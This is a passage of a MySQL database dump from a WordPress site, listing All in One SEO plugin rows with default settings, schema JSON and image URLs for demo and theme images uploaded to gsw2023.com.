  `options` longtext DEFAULT NULL,
  `created` datetime NOT NULL,
  `updated` datetime NOT NULL,
  PRIMARY KEY (`id`),
  KEY `ndx_aioseo_posts_post_id` (`post_id`)
) ENGINE=InnoDB AUTO_INCREMENT=141 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_aioseo_posts`
--

LOCK TABLES `dnctiavkr_aioseo_posts` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_aioseo_posts` DISABLE KEYS */;
INSERT INTO `dnctiavkr_aioseo_posts` VALUES
(1,324,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/r-1.png\"}]','2023-08-13 02:12:09',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:12:09','2023-08-13 02:12:09'),
(2,325,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/l-1.png\"}]','2023-08-13 02:12:09',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:12:09','2023-08-13 02:12:09'),
(3,326,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/2-l.png\"}]','2023-08-13 02:12:09',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:12:09','2023-08-13 02:12:09'),
(4,327,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/2-r.png\"}]','2023-08-13 02:12:09',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:12:09','2023-08-13 02:12:09'),
(5,329,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/l-3.png\"}]','2023-08-13 02:12:09',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:12:09','2023-08-13 02:12:09'),
(6,330,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/3-r.png\"}]','2023-08-13 02:12:09',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:12:09','2023-08-13 02:12:09'),
(7,334,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/slider-logo-img.png\"}]','2023-08-13 02:12:09',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:12:09','2023-08-13 02:12:09'),
(8,337,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/addons-hero.png\"}]','2023-08-13 02:12:09',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:12:09','2023-08-13 02:12:09'),
(9,338,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/vc-hero.png\"}]','2023-08-13 02:12:09',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:12:09','2023-08-13 02:12:09'),
(10,341,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/art-m.png\"}]','2023-08-13 02:12:09',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:12:09','2023-08-13 02:12:09'),
(11,380,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/a-1.jpg\"}]','2023-08-13 02:13:01',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:13:01','2023-08-13 02:13:01'),
(12,381,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/a-3.jpg\"}]','2023-08-13 02:13:01',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:13:01','2023-08-13 02:13:01'),
(13,411,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/bg-blur.jpg\"}]','2023-08-13 02:13:01',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:13:01','2023-08-13 02:13:01'),
(14,413,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/a-002.png\"}]','2023-08-13 02:13:01',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:13:01','2023-08-13 02:13:01'),
(15,416,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/art-4.png\"}]','2023-08-13 02:13:01',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:13:01','2023-08-13 02:13:01'),
(16,428,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/d-creative-agency.jpg\"}]','2023-08-13 02:13:01',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:13:01','2023-08-13 02:13:01'),
(17,448,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/d-psy.jpg\"}]','2023-08-13 02:13:01',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:13:01','2023-08-13 02:13:01'),
(18,451,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/d-construction.jpg\"}]','2023-08-13 02:13:01',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:13:01','2023-08-13 02:13:01'),
(19,452,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/d-resto.jpg\"}]','2023-08-13 02:13:01',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:13:01','2023-08-13 02:13:01'),
(20,453,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/d-artist.jpg\"}]','2023-08-13 02:13:01',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:13:01','2023-08-13 02:13:01'),
(21,507,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/more.jpg\"}]','2023-08-13 02:13:45',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:13:45','2023-08-13 02:13:45'),
(22,510,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/d-product.jpg\"}]','2023-08-13 02:13:45',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:13:45','2023-08-13 02:13:45'),
(23,516,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/d-cv.jpg\"}]','2023-08-13 02:13:45',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:13:45','2023-08-13 02:13:45'),
(24,520,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/d-med.jpg\"}]','2023-08-13 02:13:45',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:13:45','2023-08-13 02:13:45'),
(25,526,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/d-hosting.jpg\"}]','2023-08-13 02:13:45',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:13:45','2023-08-13 02:13:45'),
(26,535,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/d-digital-agency.jpg\"}]','2023-08-13 02:13:45',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:13:45','2023-08-13 02:13:45'),
(27,545,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/d-photography.jpg\"}]','2023-08-13 02:13:45',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:13:45','2023-08-13 02:13:45'),
(28,560,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/b-business-demo.jpg\"}]','2023-08-13 02:13:45',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:13:45','2023-08-13 02:13:45'),
